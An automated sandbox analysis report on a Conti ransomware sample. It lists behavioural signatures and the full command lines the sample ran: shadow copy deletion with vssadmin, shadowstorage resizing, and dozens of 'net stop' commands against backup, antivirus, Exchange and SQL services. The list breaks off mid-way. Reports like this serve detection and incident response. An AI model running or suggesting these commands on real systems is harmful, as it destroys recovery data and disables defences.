Malware Analysis Report

2024-10-16 03:19

Sample ID 220306-eexctshhg6
Target 2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0
SHA256 2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0
Tags conti, ransomware
Score 10/10

Analysis Overview

Threat Level: Known bad

The file 2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0 was found to be: Known bad.

Malicious Activity Summary

conti ransomware

Conti Ransomware

Deletes shadow copies

Modifies extensions of user files

Drops desktop.ini file(s)

Enumerates connected drives

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Runs net.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-06 03:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-06 03:51

Reported

2022-03-06 03:54

Platform

win7-20220223-en

Max time kernel

4294177s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe"

Signatures

Conti Ransomware

ransomware conti

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\ShowInvoke.png => C:\Users\Admin\Pictures\ShowInvoke.png.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\SetJoin.tif => C:\Users\Admin\Pictures\SetJoin.tif.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\StepMount.crw => C:\Users\Admin\Pictures\StepMount.crw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\ResetStart.tif => C:\Users\Admin\Pictures\ResetStart.tif.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\e: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1448 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 288 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 836 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1816 wrote to memory of 1004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1796 wrote to memory of 1224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1204 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe

"C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\SysWOW64\net.exe

net stop AcronisAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net.exe

net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Antivirus /y

C:\Windows\SysWOW64\net.exe

net stop Antivirus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Antivirus /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ARSM /y

C:\Windows\SysWOW64\net.exe

net stop ARSM /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ARSM /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop bedbg /y

C:\Windows\SysWOW64\net.exe

net stop bedbg /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop bedbg /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop DCAgent /y

C:\Windows\SysWOW64\net.exe

net stop DCAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop DCAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPSecurityService /y

C:\Windows\SysWOW64\net.exe

net stop EPSecurityService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPSecurityService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPUpdateService /y

C:\Windows\SysWOW64\net.exe

net stop EPUpdateService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPUpdateService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net.exe

net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EraserSvc11710 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EsgShKernel /y

C:\Windows\SysWOW64\net.exe

net stop EsgShKernel /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EsgShKernel /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop FA_Scheduler /y

C:\Windows\SysWOW64\net.exe

net stop FA_Scheduler /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop FA_Scheduler /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IISAdmin /y

C:\Windows\SysWOW64\net.exe

net stop IISAdmin /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IISAdmin /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IMAP4Svc /y

C:\Windows\SysWOW64\net.exe

net stop IMAP4Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IMAP4Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McShield /y

C:\Windows\SysWOW64\net.exe

net stop McShield /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McShield /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McTaskManager /y

C:\Windows\SysWOW64\net.exe

net stop McTaskManager /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McTaskManager /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfemms /y

C:\Windows\SysWOW64\net.exe

net stop mfemms /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfemms /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfevtp /y

C:\Windows\SysWOW64\net.exe

net stop mfevtp /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfevtp /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MMS /y

C:\Windows\SysWOW64\net.exe

net stop MMS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MMS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mozyprobackup /y

C:\Windows\SysWOW64\net.exe

net stop mozyprobackup /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mozyprobackup /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer110 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeES /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeES /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeES /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeIS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeIS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeIS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMGMT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMTA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSRS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\cmd.exe

